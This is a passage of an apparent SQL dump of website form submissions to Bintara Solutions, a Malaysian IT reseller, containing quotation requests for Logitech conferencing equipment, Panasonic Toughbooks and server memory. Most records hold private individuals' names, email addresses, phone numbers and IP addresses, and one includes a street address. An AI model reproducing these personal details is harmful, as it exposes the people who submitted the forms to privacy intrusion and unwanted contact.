digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"19\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-16 10:32:55','58.26.203.58','1'),(231,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Rafi Juli\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"rafi@globalelite.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193273889\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Global Elite Ventures Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:62:\"Request quotation for 1 unit LOGITECH GROUP VIDEO CONFERENCING\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"67\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-16 11:17:00','175.138.72.26','1'),(232,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"PENGIRAN HAFFEY IZZAT\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"haffey@sains.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0138130839\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"SAINS\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:93:\"Hello, can you brief me in details regarding AnyDesk and how it is different than TeamViewer.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"19\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-16 14:02:48','58.26.203.58','1'),(233,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Azhim Hamid\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"azhim.hamid@corelab.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0166603046\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Core Laboratories (M) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:38:\"No. 17 Jalan Jurutera U1/23 Seksyen U1\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"TOUGHBOOK 20\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"99\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-16 15:14:14','219.92.15.178','1'),(234,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Mohd Zamani bin Azman\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"mohdzamani.azman@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0187609787\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Skala Tenaga\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Johor Bahru\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Pls send me a quotation\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"27\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-16 15:58:58','123.136.115.2','1'),(235,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"mohd ikmal bin zainuddin\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"ikmal_putra@um.edu.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0192994421\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:43:\"pusat teknologi maklumat, universiti malaya\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:80:\"mohon qotation 20pcs RAM server 16G PC3L-10600R ECC R610 R710 R720 MEMORY MODULE\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-17 16:12:48','103.18.0.19','1'),(236,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Norzulaikha\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"icomputing.staff01@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0164178410\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"ICOMPUTING\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:329:\"Hi, Please let us have the quotation of this product, Panasonic Toughbook 53 14&quot;. Company Name: ICOMPUTING Attention to: Ms Norzulaikha Address: No 13, Bougainvillea A/2, Seri Bougainvillea, Bandar Seri Botani, 31350 Ipoh, Perak. Contact Number: 0164178410 / 05-3121530 Email Address: icomputing.staff01@gmail.com Thank you.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-20 10:33:59','14.192.210.3','1'),(237,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Aliff Shukor\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Aliff.Shukor@hartrodt.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60333439033\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"A. Hartrodt Malaysia\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:71:\"Wisma a.hartrodt, Unit 10-2, No,.2 Jln Setia Prima S U13/S, Setia Alam,\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-22 09:47:53','175.143.73.235','1'),(238,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Norzulaikha\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"icomputing.staff01@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0164178410\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"ICOMPUTING\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"NO 13,\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"TOUGHBOOK 54\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"quotation panasonic toughbook 54\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two 